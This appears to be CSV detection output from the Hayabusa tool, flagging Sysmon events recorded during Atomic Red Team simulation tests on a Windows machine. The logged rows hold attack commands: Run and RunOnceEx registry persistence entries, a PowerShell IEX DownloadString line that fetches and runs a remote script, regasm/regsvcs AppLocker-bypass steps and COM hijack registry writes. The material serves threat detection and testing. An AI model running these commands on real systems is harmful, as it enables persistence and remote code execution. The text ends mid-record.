14:44:53.219 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.219 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.258 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.258 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.258 +00:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys 
Modification,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.292 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.292 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.330 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.349 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 
747F3D96-D765-5D31-0000-001022C02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.371 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.402 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.075 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.075 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.137 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.137 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.137 +00:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.161 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.196 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 
747F3D96-D772-5D31-0000-001031EB2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.213 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.240 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.267 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:19.483 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object 
Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:19.483 +00:00,MSEDGEWIN10,13,medium,Persis,Powershell in Windows Run Keys,,rules/sigma/registry_sysmon/registry_set/registry_set_powershell_in_run_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:19.483 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:24.234 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:31.287 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:31.287 
+00:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,rules/sigma/file_event/file_event_win_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:31.287 +00:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/file_event_win_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.105 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.621 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 
""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.681 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.681 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.699 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.699 
+00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:56.033 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:56.069 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.052 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.443 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.484 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.484 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.767 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.775 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: 
HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.787 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.802 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.817 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 
747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.824 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.830 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.841 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.849 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM 
